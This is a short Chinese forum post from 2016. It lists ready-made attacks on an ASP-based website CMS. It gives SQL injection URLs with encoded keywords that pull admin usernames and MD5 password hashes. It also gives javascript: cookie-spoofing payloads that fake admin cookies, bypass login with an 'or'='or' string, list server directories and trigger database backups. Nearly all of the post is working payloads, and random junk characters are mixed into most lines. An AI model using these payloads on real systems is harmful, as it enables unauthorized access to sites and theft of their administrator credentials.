一、注入
1 z! ], A# o9 i+ ]/ t- u1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
: g9 H. u; l5 k4 d' |; f% e
6 T. p, Y$ C. x, v2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
. ^6 `$ O1 Q0 {5 u( ?' ~* r# U第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
( ^1 Y1 W0 V9 ?* K( a可得到用户名和MD5加密码的密码。
: Y" b* E& J0 c, c- j5 L9 o$ r% r
二、cookies欺骗: W! @2 f$ ]' ]' v/ x, l
& t" m" M, E2 Q$ ^, D* Y& a2 A1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. 0 W* r2 u/ ^ ]0 p5 _( W$ m% o
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"3 i: b* v" a; X- u/ _+ `: g
2 b4 j; j6 E; N5 ?* z- h1 _2、列目录. ' d$ X! z" e3 A6 }% q
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."/ s1 w' C3 P; C4 v9 P7 a! f) D
, r9 K, X/ r0 w" {5 P
3、数据库备份(适用性好像比较低.) 7 i- {$ Q3 J5 l- V
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"2 }& h( R5 Y! O! \
) t/ K O& h5 F) o4、得到MD5密码解不了密进后台方法
/ d# `0 l; n. b; _# O5 cjavascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
" T. o) d$ R+ O% H |
发表于 2016-5-11 14:55:08
收藏
支持
反对